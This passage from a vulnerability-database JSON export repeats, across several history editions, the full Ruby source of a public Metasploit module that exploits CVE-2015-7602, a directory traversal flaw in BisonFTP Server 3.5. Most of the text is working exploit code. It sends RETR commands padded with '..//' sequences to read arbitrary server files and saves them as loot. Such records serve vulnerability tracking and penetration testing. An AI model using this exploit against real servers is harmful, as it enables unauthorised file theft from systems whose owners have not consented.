This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-06-04T15:50:02", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-06-04T15:50:02", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-07-20T20:46:11", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-07-20T20:46:11", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-07-20T22:50:09", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-07-20T22:50:09", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-21T19:29:27", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-21T19:29:27", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-21T21:31:43", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-21T21:31:43", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T15:32:48", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T15:32:48", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T17:34:15", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
